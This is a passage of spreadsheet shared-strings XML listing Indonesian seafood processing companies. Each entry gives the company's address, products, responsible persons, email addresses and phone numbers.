  <si>
    <t>Ikan Demersal Beku, Tuna Beku, Udang Berlapis Tepung Beku, Udang Rebus Beku, Udang Mentah Beku</t>
  </si>
  <si>
    <t>Indra Winoto</t>
  </si>
  <si>
    <t>Deket</t>
  </si>
  <si>
    <t>Rejosari</t>
  </si>
  <si>
    <t>qa.ayu@ptbmi.com</t>
  </si>
  <si>
    <t>0322-3326080 / 0322-3326788</t>
  </si>
  <si>
    <t>Ayu A/085233308537</t>
  </si>
  <si>
    <t>Deni Eko Wahyudi</t>
  </si>
  <si>
    <t>PT. LAUTAN PERSADA</t>
  </si>
  <si>
    <t>Jl. Gabion Perikanan Perum Prasarana Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Udang Beku, Cephalopoda Segar, Ikan Demersal Segar, Ikan Pelagis Segar, Udang Segar</t>
  </si>
  <si>
    <t>LADY FRISTANTI</t>
  </si>
  <si>
    <t>lautanpersada@yahoo.com</t>
  </si>
  <si>
    <t>061-6943049</t>
  </si>
  <si>
    <t>KALIM - 08126090252</t>
  </si>
  <si>
    <t>PT. WINSON PRIMA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Pulau Solor No. 11 KIM-II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang</t>
  </si>
  <si>
    <t>Tjahaja</t>
  </si>
  <si>
    <t>winsonprima.sejahtera@gmail.com</t>
  </si>
  <si>
    <t>061-6871741</t>
  </si>
  <si>
    <t>Widan  Agristinto 081311348600</t>
  </si>
  <si>
    <t>CV. BARIS ANUGERAH</t>
  </si>
  <si>
    <t>Dusun III, Kel. Dulomo, Kec. Tilango, Kabupaten Gorontalo</t>
  </si>
  <si>
    <t>Tuna Segar</t>
  </si>
  <si>
    <t>RISZTY ELLEN MULDER</t>
  </si>
  <si>
    <t>barisanugerah2019@gmail.com</t>
  </si>
  <si>
    <t>SYAHLAN LATJENGKE/082394893456</t>
  </si>
  <si>
    <t>SYAHLAN LATJENGKE</t>
  </si>
  <si>
    <t>PT. NAGA LAUT BERSINAR</t>
  </si>
  <si>
    <t>Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Segar, Kepiting Segar, Ikan Demersal Segar, Lobster Segar, Ikan Pelagis Segar, Teripang Segar, Udang Segar, Tuna Segar, Cephalopoda Beku, Kepiting Beku, Sidat Beku, Gelembung Ikan Beku, Telur Ikan Beku, Ikan Air Tawar Beku, Lobster Beku, Kerang Beku, Ikan Pelagis Beku, Teripang Beku, Hiu Beku, Udang Beku, Pari Beku, Tuna Beku, Kerang Segar, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Alwi angga budiman</t>
  </si>
  <si>
    <t>nagalautbersinar@gmail.com</t>
  </si>
  <si>
    <t>021-6600123</t>
  </si>
  <si>
    <t>CV. BUANA TIRTA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami No. 34B Pergudangan SPPBE Blok F3, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>Jemis Kontaria Fong</t>
  </si>
  <si>
    <t>sbsejahtera.ags19jk@gmail.com</t>
  </si>
  <si>
    <t>Rusman &amp; +6282259566155</t>
  </si>
  <si>
    <t>Rusman</t>
  </si>
  <si>
    <t>CV. LINTAS SAMUDERA MANDIRI</t>
  </si>
  <si>
    <t>Kompleks PPI Lonrae Kav 3, Kel. Lonrae, Kec. Tanete Riattang Timur, Kabupaten Bone</t>
  </si>
  <si>
    <t>Udang Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Bandeng Beku</t>
  </si>
  <si>
    <t>MUHAMMAD YOGA SARA</t>
  </si>
  <si>
    <t>Tanete Riattang Timur</t>
  </si>
  <si>
    <t>Lonrae</t>
  </si>
  <si>
    <t>cvlintassamudramandiri@gmail.com</t>
  </si>
  <si>
    <t>NURDIN KASIM 081355667808</t>
  </si>
  <si>
    <t>NURDIN KASIM</t>
  </si>
  <si>
    <t>PT. HASIL INDO SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami, Kompleks Pergudangan Karunia Sulawesi Blok G8, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>Hu Jia Jun</t>
  </si>
  <si>
    <t>hasilindosejahtera@yahoo.com</t>
  </si>
  <si>
    <t>St Masita 085211407354</t>
  </si>
  <si>
    <t>PT. FUDA SARI LAUT</t>
  </si>
  <si>
    <t>Jl. M. Yakub Lubis No.99/I Dusun III, Kel. Bandar Khalifah, Kec. Percut Sei Tuan, Kabupaten Deli Serdang</t>
  </si>
  <si>
    <t>Udang Rebus Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>NETAPKEN POERBA</t>
  </si>
  <si>
    <t>Bandar Khalifah</t>
  </si>
  <si>
    <t>fudasarilaut@gmail.com</t>
  </si>
  <si>
    <t>061-73389999</t>
  </si>
  <si>
    <t>Rinto 082199503431, Merita 0811610877</t>
  </si>
  <si>
    <t>PT. BIRU SAMUDERA PERKASA</t>
  </si>
  <si>
    <t>Jl. PPD Blok C-2 No.2 RT 004 RW 004, Kel. Kedaung Kali Angke, Kec. Cengkareng, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Udang Beku, Lobster Beku</t>
  </si>
  <si>
    <t>FRANKY JONG</t>
  </si>
  <si>
    <t>birusamudera.perkasa@gmail.com</t>
  </si>
  <si>
    <t>Yustian &amp; 082220396180</t>
  </si>
  <si>
    <t>MENTARI MULYO</t>
  </si>
  <si>
    <t>Derman RT 005, Kel. Sumbermulyo, Kec. Bambang Lipuro, Kabupaten Bantul</t>
  </si>
  <si>
    <t>Asap, Lainnya</t>
  </si>
  <si>
    <t>Lele Asap, Bandeng Presto</t>
  </si>
  <si>
    <t>BAKIRAH</t>
  </si>
  <si>
    <t>Bambang Lipuro</t>
  </si>
  <si>
    <t>Sumbermulyo</t>
  </si>
  <si>
    <t>mentarimulyo@gmail.com</t>
  </si>
  <si>
    <t>NGADIMAH 081327524406</t>
  </si>
  <si>
    <t>NGADIMAH</t>
  </si>
  <si>
    <t>PT. AGRO WESTINDO ABADI</t>
  </si>
  <si>
    <t>Cephalopoda Segar, Cephalopoda Beku, Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Segar, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Arif Fuad</t>
  </si>
  <si>
    <t>fathendra.awa@gmail.com</t>
  </si>
  <si>
    <t>gunawan ghufron- 08568675335</t>
  </si>
  <si>
    <t>Gunawan Ghufron</t>
  </si>
  <si>
    <t>UD. PIALA I</t>
  </si>
  <si>
    <t>Jl. Cakalang, Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Kampung Baru, Kec. Sorong Kota, Kota Sorong</t>
  </si>
  <si>
    <t>HARSONO SUTANTO</t>
  </si>
  <si>
    <t>Sorong Kota</t>
  </si>
  <si>
    <t>Kampung Baru</t>
  </si>
  <si>
    <t>pialasorong@gmail.com</t>
  </si>
  <si>
    <t>0951 - 332156</t>
  </si>
  <si>
    <t>RANI IRIAWATI HP. 085244282419</t>
  </si>
  <si>
    <t>TEGUH SUBROTO</t>
  </si>
  <si>
    <t>PT. ACEH MARINA LAUT</t>
  </si>
  <si>
    <t>Jl. Awe Blang No.3, Kel. Neusu Aceh, Kec. Baiturrahman, Kota Banda Aceh</t>
  </si>
  <si>
    <t>Tuna Beku, Ikan Pelagis Beku, Udang Segar, Ikan Demersal Segar, Lobster Hidup, Kepiting Hidup, Ikan Demersal Hidup</t>
  </si>
  <si>
    <t>RAHMA DANI SYAPUTRA</t>
  </si>
  <si>
    <t>Baiturrahman</t>
  </si>
  <si>
    <t>Neusu Aceh</t>
  </si>
  <si>
    <t>RAHMA DANI SYAPUTRA/ 082166911291</t>
  </si>
  <si>
    <t>PT. ANPING SEAFOOD INDONESIA</t>
  </si>
  <si>
    <t>Jl. Efraim Lengkong, Kel. Manembo-nembo, Kec. Matuari, Kota Bitung</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Tuna Beku, Tuna Loin Beku, Steak Tuna Beku, Fillet Tuna Segar, Tuna Segar, Fillet Ikan Beku, Ikan Demersal Beku, Ikan Demersal Segar, Fillet Ikan Segar, Steak Tuna Segar</t>
  </si>
  <si>
    <t>Chou, Chih-Tsung</t>
  </si>
  <si>
    <t>Manembo-nembo</t>
  </si>
  <si>
    <t>anping.seafood@yahoo.com</t>
  </si>
  <si>
    <t>+62 438 2232093</t>
  </si>
  <si>
    <t>Fandy Rompas   +62 896-8290-7888</t>
  </si>
  <si>
    <t>Jianhua Huang</t>
  </si>
  <si>
    <t>CV. JAYA SEAFOOD</t>
  </si>
  <si>
    <t>Jl. Syiah Kuala, Kel. Lamdingin, Kec. Kuta Alam, Kota Banda Aceh</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Ikan Demersal Segar, Fillet Ikan Segar, Tuna Segar, Tuna Loin Segar, Udang Segar, Cephalopoda Segar</t>
  </si>
  <si>
    <t>Muhammad Yusuf, ST</t>
  </si>
  <si>
    <t>Lamdingin</t>
  </si>
  <si>
    <t>mhdyusuf@consultant.com</t>
  </si>
  <si>
    <t>Hendra 082364489746</t>
  </si>
  <si>
    <t>Hendra</t>
  </si>
  <si>
    <t>PT. SINAR BAHARI LAUTAN TIMUR INDONESIA</t>
  </si>
  <si>
    <t>Jl. Lingkar Timur Pergudangan Sinar Buduran III Blok C-03, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Rajungan Beku, Pari Beku, Udang Beku, Lobster Beku, Kerang Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Ikan Hasil Budidaya Beku, Fillet Ikan Beku, Tuna Beku</t>
  </si>
  <si>
    <t>MOH. SYAIFUDDIN AMRULLAH</t>
  </si>
  <si>
    <t>Siwalan Panji</t>
  </si>
  <si>
    <t>sinarbahari.lautantimur@gmail.com</t>
  </si>
  <si>
    <t>MOH. SYAIFUDDIN AMRULLAH 08123583402</t>
  </si>
  <si>
    <t>MINA ABADHI FARM</t>
  </si>
  <si>
    <t>Dusun Janten RT 06, Kel. Ngestiharjo, Kec. Kasihan, Kabupaten Bantul</t>
  </si>
  <si>
    <t>Abon Ikan, Crispy Ikan</t>
  </si>
  <si>
    <t>W.M. JUNUS</t>
  </si>
  <si>
    <t>Kasihan</t>
  </si>
  <si>
    <t>Ngestiharjo</t>
  </si>
  <si>
    <t>minaabadifarm@gmail.com</t>
  </si>
  <si>
    <t>W.M. JUNUS 0811101951</t>
  </si>
  <si>
    <t>MINI PLANT PUTRI AYU</t>
  </si>
  <si>
    <t>Dusun Daksan, Kel. Aengsareh, Kec. Sampang, Kabupaten Sampang</t>
  </si>
  <si>
    <t>Anissa angga Apriliani</t>
  </si>
  <si>
    <t>Sampang</t>
  </si>
  <si>
    <t>Aengsareh</t>
  </si>
  <si>
    <t>qccrab@kmlseafood.com</t>
  </si>
  <si>
    <t>Suhardi hamzah ( 087701055523)</t>
  </si>
  <si>
    <t>LAMSIR</t>
  </si>
  <si>
    <t>PT. TIRTA BITUNG BAHARI</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Bitung , Kel. Aertembaga Satu, Kec. Aertembaga , Kota Bitung</t>
  </si>
  <si>
    <t>Tuna Segar, Tuna Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>AKHMAD FAOZI</t>
  </si>
  <si>
    <t xml:space="preserve">Aertembaga </t>
  </si>
  <si>
    <t>tirtabitungbahari@gmail.com</t>
  </si>
  <si>
    <t>RAMLAN ADLANI / 081267977501</t>
  </si>
  <si>
    <t>RAMLAN ADLANI</t>
  </si>
  <si>
    <t>CV. KING OF MILK FISH</t>
  </si>
  <si>
    <t>Desa Raja, Kel. Raja, Kec. Bendahara, Kabupaten Aceh Tamiang</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Demersal Segar, Ikan Pelagis Beku, Udang Beku, Udang Segar, Lobster Beku, Lobster Segar, Rajungan Beku, Rajungan Segar</t>
  </si>
  <si>
    <t>ZAINAL ABIDIN</t>
  </si>
  <si>
    <t>Bendahara</t>
  </si>
  <si>
    <t>Raja</t>
  </si>
  <si>
    <t>mustikaa211@gmail.com</t>
  </si>
  <si>
    <t>ZAINAL ABIDIN 08116226465</t>
  </si>
  <si>
    <t>PT. MINA TIMUR INDONESIA</t>
  </si>
  <si>
    <t>Jl. Pendidikan No.8, Kel. Bontolanra, Kec. Galesong Utara, Kabupaten Takalar</t>
  </si>
  <si>
    <t>Sri Ramayanti Rauf</t>
  </si>
  <si>
    <t>Bontolanra</t>
  </si>
  <si>
    <t>pt.mina.timur.indonesia@gmail.com</t>
  </si>
  <si>
    <t>Sri Ramayanti Rauf &amp; 081241333359</t>
  </si>
  <si>
    <t>CV. NOGO SEGORO</t>
  </si>
  <si>
    <t>Jl. Kidemang Singomenggolo Kav 4, Kel. Sidomulyo, Kec. Buduran, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Udang Beku, Ikan Demersal Beku, Ikan Air Tawar Beku, Cephalopoda Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>ABU SASIKIRONO</t>
  </si>
  <si>
    <t>Sidomulyo</t>
  </si>
  <si>
    <t>nogosegoro.cv@gmail.com</t>
  </si>
  <si>
    <t>031-99033481</t>
  </si>
  <si>
    <t>YULIA 085781001540</t>
  </si>
  <si>
    <t>TEGUH TRIHARSONO</t>
  </si>
  <si>
    <t>PT. RIKA RAYHAN MANDIRI</t>
  </si>
  <si>
    <t>Jl. Kima IV Kav P3A, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>H. ABD. FATTAH MASKUR</t>
  </si>
  <si>
    <t xml:space="preserve">Daya </t>
  </si>
  <si>
    <t>nafiriyunias4@gmail.com</t>
  </si>
  <si>
    <t>0411-518030</t>
  </si>
  <si>
    <t>H. ABD. FATTAH MASKUR 08114209979</t>
  </si>
  <si>
    <t>CV. ANUGERAH ARTHA ABADI</t>
  </si>
  <si>
    <t>Jl. Nambangan 09, Kel. Kenjeran, Kec. Tanah Kali Kedinding, Kota Surabaya</t>
  </si>
  <si>
    <t>Hello@gobaksoikan.com</t>
  </si>
  <si>
    <t>RONALD SISWANTO</t>
  </si>
  <si>
    <t>PT. GOLDEN CUP SEAFOOD</t>
  </si>
  <si>
    <t>Jl. Gabion Perikanan No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan</t>
  </si>
  <si>
    <t>Udang Beku, Ikan Demersal Beku, Cephalopoda Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>RODY ISKANDAR</t>
  </si>
  <si>
    <t>akhmadfaisalbatubara0808@gmail.com</t>
  </si>
  <si>
    <t>FREDI FRANATA SITUMEANG S.Tr.Pi / 085289597379</t>
  </si>
  <si>
    <t>FREDI FRANATA SITUMEANG S.Tr.Pi</t>
  </si>
  <si>
    <t>PT. CHONG SEN TRADING</t>
  </si>
  <si>
    <t>Jl. Raya Karangandong Legundi Business Park A7, Kel. Banjaran, Kec. Driyorejo, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Yohanes Adinata Wijaya</t>
  </si>
  <si>
    <t>Driyorejo</t>
  </si>
  <si>
    <t>Banjaran</t>
  </si>
  <si>
    <t>pt.chongsen.indo@gmail.com</t>
  </si>
  <si>
    <t>031-99009030</t>
  </si>
  <si>
    <t>Yohanes Adinata Wijaya 08123018880</t>
  </si>
  <si>
    <t>CV. KIRANA HIKARI INDONESIA</t>
  </si>
  <si>
    <t>Dusun Glundung RT 004 RW 002, Kel. Pranti, Kec. Menganti, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Perut Ikan Kering, Teripang Kering, Kulit Hiu Kering, Kulit Pari Kering, Sirip Hiu Kering, Telur Ikan Terbang Kering, Abalone Kering, Cacing Laut Kering</t>
  </si>
  <si>
    <t>SYAHRIL YANUAR CHAPRI</t>
  </si>
  <si>
    <t>Pranti</t>
  </si>
  <si>
    <t>kiranahikari.indo@gmail.com</t>
  </si>
  <si>
    <t>031-51501609</t>
  </si>
  <si>
    <t>AGENG RIZKY 081216609559</t>
  </si>
  <si>
    <t>PERUM PERIKANAN INDONESIA UNIT MAYANGAN</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Pantai Mayangan, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo</t>
  </si>
  <si>
    <t>Ikan Beku Hasil Budidaya, Tuna Beku, Udang Beku, Kerang Beku, Ikan Pelagis Beku, Fillet Ikan Beku, Ikan Demersal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Eko Hadriadi Usodo</t>
  </si>
  <si>
    <t>perumperindo.unitmayangan@gmail.com</t>
  </si>
  <si>
    <t>(0322) 661544</t>
  </si>
  <si>
    <t>Indra Aristyan / 082298439322</t>
  </si>
  <si>
    <t>Indra Aristyan</t>
  </si>
  <si>
    <t>PT. PERIKANAN NUSANTARA (PERSERO) UNIT MIMIKA</t>
  </si>
  <si>
    <t>Jl. Kawasan Industri Perikanan Poumako, Kel. Poumako, Kec. Mimika, Kabupaten Mimika</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Loin Beku, Tuna Loin Segar, Kepiting Hidup, Udang Beku</t>
  </si>
  <si>
    <t xml:space="preserve">Mochammad Yana Aditya </t>
  </si>
  <si>
    <t xml:space="preserve">Mimika </t>
  </si>
  <si>
    <t>Poumako</t>
  </si>
  <si>
    <t>upimimika@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">Salasa Makian </t>
  </si>
  <si>
    <t>Jl. Pulau Nias Selatan No.1 KIM 3, Kel. Mabar, Kec. Medan Deli, Kota Medan</t>
  </si>
  <si>
    <t>Salmon Beku, Trout Beku, Ikan Pelagis Beku, Kerang Beku, Scallop Beku, Mussel Beku, Cephalopoda Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Gloria Manalu</t>
  </si>
  <si>
    <t xml:space="preserve">Medan Deli </t>
  </si>
  <si>
    <t>cvlautanmas2014@gmail.com</t>
  </si>
  <si>
    <t>Gloria 085261772403</t>
  </si>
  <si>
    <t xml:space="preserve">Gloria Manalu </t>
  </si>
  <si>
    <t>PT. CITRADIMENSI ARTHALI</t>
  </si>
  <si>
    <t>Jl. Pulau Sulawesi Kawasan Industri Medan 1, Kel. Mabar, Kec. Medan Deli, Kota Medan</t>
  </si>
  <si>
    <t>Roll Ikan, Surimi Beku</t>
  </si>
  <si>
    <t>Henry Marpauli</t>
  </si>
  <si>
    <t>hasibuan_fredy@yahoo.com</t>
  </si>
  <si>
    <t>(061) 6851924</t>
  </si>
  <si>
    <t>Fredy Hasibuan ( 081362851985)</t>
  </si>
  <si>
    <t>Fredy Hasibuan</t>
  </si>
  <si>
    <t>Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Cephalopoda Beku, Tuna Loin Segar, Tuna Loin Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>ALBERT HARTANTO</t>
  </si>
  <si>
    <t>ambpermata2@gmail.com</t>
  </si>
  <si>
    <t>Sofyan Afandi/ 081343094407</t>
  </si>
  <si>
    <t>CV. BELIDA</t>
  </si>
  <si>
    <t>Jl. Inspeksi Jasa Tirta, Kel. Bono, Kec. Boyolangu, Kabupaten Tulungagung</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku, Fillet Patin Beku</t>
  </si>
  <si>
    <t>Frida Nirmala</t>
  </si>
  <si>
    <t>Boyolangu</t>
  </si>
  <si>
    <t>Bono</t>
  </si>
  <si>
    <t>admin@cvbelida.com</t>
  </si>
  <si>
    <t>0852-3283-8788</t>
  </si>
  <si>
    <t>Ahmad Fauzi 0852-3283-8788</t>
  </si>
  <si>
    <t>PT. SALIM JAYA</t>
  </si>
  <si>
    <t>Jl. Pulau Nias Selatan No.1 KIM III, Kel. Mabar, Kec. Medan Deli, Kota Medan</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Udang Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Kerang Beku, Salmon Beku, Scallop Beku</t>
  </si>
  <si>
    <t xml:space="preserve">Betbon </t>
  </si>
  <si>
    <t>salimjayafish@gmail.com</t>
  </si>
  <si>
    <t>061-4557588, 061-4568522</t>
  </si>
  <si>
    <t>Chandra 085261772403</t>
  </si>
  <si>
    <t xml:space="preserve">Chandra </t>
  </si>
  <si>
    <t>PT. INDO KREASI ANDALAN NUSANTARA</t>
  </si>
  <si>
    <t>Pergudangan Safe N Lock Blok K 1718 Jl Lingkar Timur Km 5.5, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Shirly Maria Yuniwati</t>
  </si>
  <si>
    <t>ikanbagibangsa@gmail.com</t>
  </si>
  <si>
    <t>Marlon N Kurniawan 082232988088</t>
  </si>
  <si>
    <t>PT. MINA JAYA LESTARI</t>
  </si>
  <si>
    <t>Pergudangan Margomulyo Permai Blok J- 12, J-12A, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya</t>
  </si>
  <si>
    <t>Tuna Beku, Ikan Pelagis Beku, Bandeng Beku</t>
  </si>
  <si>
    <t>Sugeng Tjahjono</t>
  </si>
  <si>
    <t>mjlsurabaya@yahoo.com</t>
  </si>
  <si>
    <t>031-5681824</t>
  </si>
  <si>
    <t>Eva Yuliana Saraswati &amp; 081216553405</t>
  </si>
  <si>
    <t>Eva Yuliana Saraswati</t>
  </si>
  <si>
    <t>PT. ANUGRAH SUMBER LAUT</t>
  </si>
  <si>
    <t>Jl. Pemelisan I Gg. Ikan Tumbuk No.17, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar, Cephalopoda Segar, Teripang Kering, Udang Segar</t>
  </si>
  <si>
    <t>Howarti</t>
  </si>
  <si>
    <t>asumberlaut@gmail.com</t>
  </si>
  <si>
    <t>Adi Zenius 081293723335</t>
  </si>
  <si>
    <t>CV. INDOTROPIC FISHERY</t>
  </si>
  <si>
    <t>Jl. Raya Km 9, Kel. Biak, Kec. Luwuk Utara, Kabupaten Banggai</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Cephalopoda Beku, Tuna Beku</t>
  </si>
  <si>
    <t>EDDY HANDOKO</t>
  </si>
  <si>
    <t>Biak</t>
  </si>
  <si>
    <t>silvesterdaet3@gmail.com</t>
  </si>
  <si>
    <t>085342456000, 0461-3201277</t>
  </si>
  <si>
    <t>EDDY HANDOKO 085242456000</t>
  </si>
  <si>
    <t>CV. HASIL ALAMINDO</t>
  </si>
  <si>
    <t>Jl. Semarang - Demak Km 7, Kel. Banjardowo, Kec. Genuk, Kota Semarang</t>
  </si>
  <si>
    <t>Paha Kodok Beku</t>
  </si>
  <si>
    <t>POH LIANA DEWI</t>
  </si>
  <si>
    <t>Banjardowo</t>
  </si>
  <si>
    <t>nagata.hasilalamindo@gmail.com</t>
  </si>
  <si>
    <t>POH LIANA DEWI (081901873396)</t>
  </si>
  <si>
    <t>NAGATA YOHANES ANDIKA</t>
  </si>
  <si>
    <t>PT. BIRU LAUT NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Kima 8 Kav SS No. 23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Bandeng Segar, Bandeng Beku, Tuna Segar, Tuna Beku, Kepiting Segar, Udang Kipas Segar, Kepiting Beku, Udang Kipas Beku, Bandeng Tanpa Duri</t>
  </si>
  <si>
    <t>SITTI TASKIA</t>
  </si>
  <si>
    <t>birulautnusantara23a@gmail.com</t>
  </si>
  <si>
    <t>0411-4723189</t>
  </si>
  <si>
    <t>Rani 082187306969</t>
  </si>
  <si>
    <t>EDI JUNAEDI</t>
  </si>
  <si>
    <t>PT. KARYA MINA PUTRA</t>
  </si>
  <si>
    <t>Dukuh Matalan, Kel. Purworejo, Kec. Kaliori, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Keong Beku, Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>MOCHAMAD NUR ACHLIS</t>
  </si>
  <si>
    <t>listyorahayu3@gmail.com</t>
  </si>
  <si>
    <t>(0295)692202</t>
  </si>
  <si>
    <t>BAMBANG SUPRIYADI (082185209433)</t>
  </si>
  <si>
    <t>PT. DHARMA SAMUDERA FISHING INDUSTRIES</t>
  </si>
  <si>
    <t>Jl. Laks. RE. Martadinata I , Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku, Lobster Beku, Ikan Demersal Beku, Ikan Demersal Segar, Ikan Pelagis Beku, Cephalopoda Beku, Gurita Rebus Beku, Bandeng Beku, Udang Kipas Beku, Tuna Beku</t>
  </si>
  <si>
    <t xml:space="preserve">Ewijaya </t>
  </si>
  <si>
    <t>dharmas1@cbn.net.id</t>
  </si>
  <si>
    <t>Ewijaya</t>
  </si>
  <si>
    <t>PT. SARANA INDOGUNA LESTARI</t>
  </si>
  <si>
    <t>Kawasan Industri Millenium Jl. Millenium 22 Blok R5 No.3 Room C1, Kel. Kaduagung, Kec. Tigaraksa, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Kepiting Beku, Mussel Segar, Scallop Segar, Tiram Segar, Cephalopoda Segar, Cephalopoda Beku, Mussel Beku, Scallop Beku, Tiram Beku, Salmon Beku, Trout Beku, Salmon Segar, Trout Segar</t>
  </si>
  <si>
    <t>Arya Abdi Effendy</t>
  </si>
  <si>
    <t>Tigaraksa</t>
  </si>
  <si>
    <t>Kaduagung</t>
  </si>
  <si>
    <t>saranalestari.sil@gmail.com</t>
  </si>
  <si>
    <t>Beny Krisnawan Putra (08113550022)</t>
  </si>
  <si>
    <t>Juard Effendi</t>
  </si>
  <si>
    <t>UD. HALIM JAYA</t>
  </si>
  <si>
    <t>Jl. Raya Deli Tua - Patumbak Km 18.5, Jl. Lantasan Baru No.1, Kel. Cinta Damai, Kec. Patumbak, Kabupaten Deli Serdang</t>
  </si>
  <si>
    <t>Lobster Hidup, Siput Hidup, Labi-Labi Hidup, Sidat Hidup, Kerang Hidup, Kepiting Hidup, Lobster Air Tawar Hidup</t>
  </si>
  <si>
    <t>Patumbak</t>
  </si>
  <si>
    <t>Cinta Damai</t>
  </si>
  <si>
    <t>halimjayahalim@hotmail.com</t>
  </si>
  <si>
    <t>Lity Yuliana  081260128111</t>
  </si>
  <si>
    <t>Lim Hau Tiong</t>
  </si>
  <si>
    <t>PT. PERFECT INTERNATIONAL FOOD</t>
  </si>
  <si>
    <t>Jl. Raya Gintik RT 005 RW 002, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>H. JAKPAR AMSE</t>
  </si>
  <si>
    <t>perfectinterfood@gmail.com</t>
  </si>
  <si>
    <t>0333-593454</t>
  </si>
  <si>
    <t>HARTONO / 081234611678</t>
  </si>
  <si>
    <t>MINI PLANT PROYEK 1</t>
  </si>
  <si>
    <t>Jl. TPI Prapag Kidul RT 05 RW 04, Kel. Prapag Kidul, Kec. Losari, Kabupaten Brebes</t>
  </si>
  <si>
    <t>Muhlis</t>
  </si>
  <si>
    <t>Losari</t>
  </si>
  <si>
    <t>Prapag Kidul</t>
  </si>
  <si>
    <t>Jenirina6@gmail.com</t>
  </si>
  <si>
    <t>KHOIRUDDIN</t>
  </si>
  <si>
    <t>PT. PERIKANAN NUSANTARA (PERSERO) CABANG AMBON</t>
  </si>
  <si>
    <t>Jl. Kapten Piere Tendean, Kel. Galala, Kec. Sirimau, Kota Ambon</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Loin Beku, Tuna Loin Segar, Cephalopoda Beku, Cephalopoda Segar</t>
  </si>
  <si>
    <t>PT.  PERIKANAN NUSANTARA (PERSERO)</t>
  </si>
  <si>
    <t>Galala</t>
  </si>
  <si>
    <t>nusantaraambon@gmail.com</t>
  </si>
  <si>
    <t>0911 344799</t>
  </si>
  <si>
    <t>ASNIAR ALAM 082248287993</t>
  </si>
  <si>
    <t>MINTO YUWONO</t>
  </si>
  <si>
    <t>PT. ARABIKATAMA KHATULISTIWA FISHING INDUSTRY</t>
  </si>
  <si>
    <t>Kompleks Dermaga TNI-AU Pattimura, Kel. Laha, Kec. Teluk Ambon, Kota Ambon</t>
  </si>
  <si>
    <t>SY. ALWE HADDAD</t>
  </si>
  <si>
    <t>qcambon@arabikatama.com</t>
  </si>
  <si>
    <t>0911-323826, 0911-323824</t>
  </si>
  <si>
    <t>ERVIN SUTIOSO, TEGUH SANTOSO 0811405209</t>
  </si>
  <si>
    <t>ERVIN SUTIOSO</t>
  </si>
  <si>
    <t>CV. WAN QIAN</t>
  </si>
  <si>
    <t>Duta Bandara Permai Blok ZU 5 No.1-3, Kel. Jati Mulya, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
